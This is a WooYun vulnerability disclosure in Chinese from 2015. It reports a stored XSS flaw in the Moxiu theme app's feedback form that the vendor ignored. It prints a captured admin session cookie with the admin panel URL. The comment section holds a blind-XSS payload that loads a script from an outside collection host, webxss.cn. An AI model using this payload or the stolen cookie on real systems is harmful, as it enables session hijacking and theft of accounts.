当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160908

漏洞标题:魔秀主题app存在xss存储型漏洞,盲打已打管理cookie

相关厂商:moxiu.com

漏洞作者: 小毛毛

提交时间:2015-12-13 09:57

修复时间:2015-12-18 09:58

公开时间:2015-12-18 09:58

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-13: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

魔秀主题app存在xss存储型漏洞,盲打已打管理cookie

详细说明:

魔秀主题app存在xss存储型漏洞,盲打已打管理cookie
漏洞证明:
首先我们进去魔秀主题:
会看到个意见反馈,

魔秀主题漏洞1.jpg


点击意见反馈,

魔秀主题漏洞.jpg


在意见反馈栏里面输入我们的盗取cookie代码,
然后提交反馈,

魔秀主题APK漏洞核心.jpg


坐等管理cookie既可
管理cookie图片证明

魔秀cookie截图.png

漏洞证明:

cookie证明:
2015-12-08 16:50:18
location : http://feedback.moxiu.net/?do=Feedback.List&source=manager&sysversion=&model=&manufacturer=&cmversion=5.2.6&contact=&content=&start=2015-12-07 00%3A00%3A00&end=2015-12-07 00%3A00%3A00&action=&status=0&page=2
toplocation : http://feedback.moxiu.net/?do=Feedback.List&source=manager&sysversion=&model=&manufacturer=&cmversion=5.2.6&contact=&content=&start=2015-12-07 00%3A00%3A00&end=2015-12-07 00%3A00%3A00&action=&status=0&page=2
cookie : ima_feedback=8musmAToYfJVzWa66ewWM9S%2B2zQlDw5zPFKrI%2FSn3%2BnJ34Jusu77mQB32M6Z%2BSXKHxR6wsnzn%2FW6ZlH%2B7YeGe1uu11Kbu5nsgMwq%2FgQfA2%2BlBo5C23ilDoDji%2B5ImRzHJKFkOFZXLrsLnk0l
opener :
HTTP_REFERER : http://feedback.moxiu.net/?do=Feedback.List&source=manager&sysversion=&model=&manufacturer=&cmversion=5.2.6&contact=&content=&start=2015-12-07+00%3A00%3A00&end=2015-12-07+00%3A00%3A00&action=&status=0&page=2
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
REMOTE_ADDR :

修复方案:

过滤字符,对字符的长度进行限制

版权声明:转载请注明来源 小毛毛@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-18 09:58

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-15 13:06 | 小毛毛 ( 路人 | Rank:14 漏洞数:5 | </textarea>'"><script src=http://webxss....)

    </textarea>'"><script src=http://webxss.cn/BDaJkx?1449628267></script>